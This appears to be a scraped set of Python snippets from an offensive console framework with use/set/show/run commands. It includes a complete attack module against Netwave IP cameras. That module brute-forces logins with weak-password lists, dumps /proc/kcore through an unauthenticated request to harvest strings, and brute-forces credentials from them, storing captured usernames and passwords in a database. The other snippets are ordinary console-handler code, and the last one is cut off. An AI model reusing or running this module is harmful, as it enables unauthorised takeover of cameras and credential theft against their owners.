示例#1
0
 def do_info(self, line):
     """info
     Prints module info"""
     if self.current_frame:
         pp(self.current_frame.__info__, indent=4)
     else:
         print_utils.time_print("Select module first")
示例#2
0
 def do_run(self, line):
     """run
     Run current module"""
     if self.current_frame is not None:
         self.current_frame.run()
         print("\n\n", end="")
     else:
         print_utils.time_print("Select module first")
示例#3
0
 def do_show(self, line):
     """search {options/modules}
     Shows details"""
     if line == "options":
         if self.current_frame is None:
             print_utils.time_print("Select module first")
         else:
             print("")
             self.current_frame.print_options()
     if line == "modules" or line == "":
         print("")
         print(print_utils.get_modules_search_table("", self.modules._arr))
     if line == "info":
         print("")
         self.current_frame.print_info()
示例#4
0
    def do_set(self, line):
        """set [option_name] [value]
        Run current module"""
        def usage():
            print_utils.time_print(
                "Invalid number of arguments for 'set' command")
            print_utils.time_print("set command usage: set <option> <value>")

        if not self.current_frame:
            print_utils.time_print("Select module first")
            return False
        line = line.split(" ")
        if len(line) < 2:
            usage()
            return False
        if len(line) != 2:
            if not line[1].startswith(config.LST_IND):
                usage()
                return False
            # for list indicator
            if line[1].startswith(config.LST_IND):
                line = [line[0], "".join(line[1:])]
        opt_name, opt_set_value = line

        options = []
        for item in self.current_frame._options:
            if item.opt_name == opt_name:
                options.append(item)

        for option in options:
            try:
                option.set_option_value(opt_set_value)
                print_utils.clear_screen()
            except Exception as e:
                print_utils.clear_screen()
                print("[-]", e, "\n")
            self.current_frame.print_options()
            return False
        print_utils.time_print("There's no option called '%s'" % opt_name)
示例#5
0
 def do_use(self, line):
     """use {module_name/module_id}
     Use module"""
     line = line.split(" ")[0]
     # By id or by name
     try:
         module_id = int(line)
         loc_module = self.modules.by_id(module_id)
         if loc_module:
             module_name = loc_module["use_name"]
         else:
             module_name = None
     except ValueError:
         module_name = line
         loc_module = self.modules.by_name(module_name)
         module_id = loc_module["id"] if loc_module is not None else None
     # Create frame
     if loc_module is not None:
         self.current_frame = bind_frame(loc_module["handle"])()
         self.current_frame.print_options()
         self.prompt = self.format_prompt % module_name
     else:
         print_utils.time_print("No such module like: %s" % module_name)
     return False
示例#6
0
 def usage():
     print_utils.time_print(
         "Invalid number of arguments for 'search' command")
     print_utils.time_print("set command usage: search <term>")
示例#7
0
 def usage():
     print_utils.time_print(
         "Invalid number of arguments for 'set' command")
     print_utils.time_print("set command usage: set <option> <value>")
示例#8
0
    def run(self):
        if not self.validate():
            print_utils.time_print("Module run stopped")
            return False
        # init variables
        targets, ssl = self.opt_val("targets"), self.opt_val("ssl")

        protocol = "https" if ssl else "http"
        pool = [(
            "%s://%s/get_status.cgi" % (protocol, target),
            "%s://%s//proc/kcore" % (protocol, target),
            "%s://%s/check_user.cgi" % (protocol, target),
            "%s" % (target),
        ) for target in targets]
        location = 10100
        sleeping = 20

        for P in pool:
            dump_results = []
            print("[>] Target:", P[3])
            string_len = 0
            # Step -1: skip if in db
            if self.db.is_camera_in_credentials(P[3]) is True:
                print("[*] Target already in database (skipping)")
                continue
            # Step 0: soft bruteforce
            if self.opt_val("brute") or self.opt_val("brute-only"):
                ip, port = P[3].split(":")
                http_discovery = HTTPStatusCodeDiscovery(ip, port)
                endpoints = http_discovery.discover(["check_user.cgi"], 401)
                if endpoints != []:
                    brute_url = endpoints[0]["url"]
                    print("Trying to bruteforce:", brute_url)
                    soft_brute = HTTPBruteforce()
                    usernames = AssetManager(
                        ["bruteforce", "easy_usernames.txt"])
                    passwords = AssetManager(
                        ["bruteforce", "easy_passwords.txt"])
                    results = soft_brute.http_basic_auth_bruteforce(
                        brute_url,
                        usernames.lines(),
                        passwords.lines(),
                        verbose=True)
                    for user, pwd in results:
                        self.save(ipport=P[3], user=user, pwd=pwd)
                if results != []:
                    print("[+] Bruteforce succeeded. Skipping this target.")
                    continue
                else:
                    if self.opt_val("brute-only"):
                        continue
                    print("[*] Bruteforce failed. Sleeping 10s to recover.")
                    time.sleep(10)
            # Step 1 : Get MAC
            try:
                self.MAC = netwave_get_mac(P[0])
                print("Got MAC: %s" % str(self.MAC, "utf8"))
            except Exception as e:
                print("Got MAC exception:", e)
                continue
            # Step 2 : Dump
            try:
                req = requests.get(P[1], stream=True, timeout=7)
                print("Status code:", req.status_code)
                print("Vulnarable:", "Yes" if req.status_code == 200 else "No")

                for chunk in req.iter_content(chunk_size=8192):
                    lst, _ = strings.regex_strings(chunk)
                    string_len += _
                    print("\rProgress: %.2f%%\t" %
                          ((string_len / location) * 100),
                          end="")
                    if self.MAC in lst:
                        print("\n[+] Found location")
                        dump_results = lst
                        self.db.insert_dump(ipport=P[3],
                                            dump=b":::".join(dump_results))
                        break

                # Step 3 : Bruteforce
                if dump_results != []:
                    del req
                    print("\nSleeping: %ss" % sleeping)
                    time.sleep(sleeping)
                    brute = HTTPBruteforce()
                    creds = list(set(dump_results))
                    results = brute.http_basic_auth_bruteforce(P[2],
                                                               creds,
                                                               creds,
                                                               verbose=True)
                    for user, pwd in results:
                        self.save(ipport=P[3], user=user, pwd=pwd)
            except Exception as e:
                print("Dump exception: ", e)
                continue
示例#9
0
 def run(self):
     if not self.validate():
         print_utils.time_print("Module run stopped")
         return False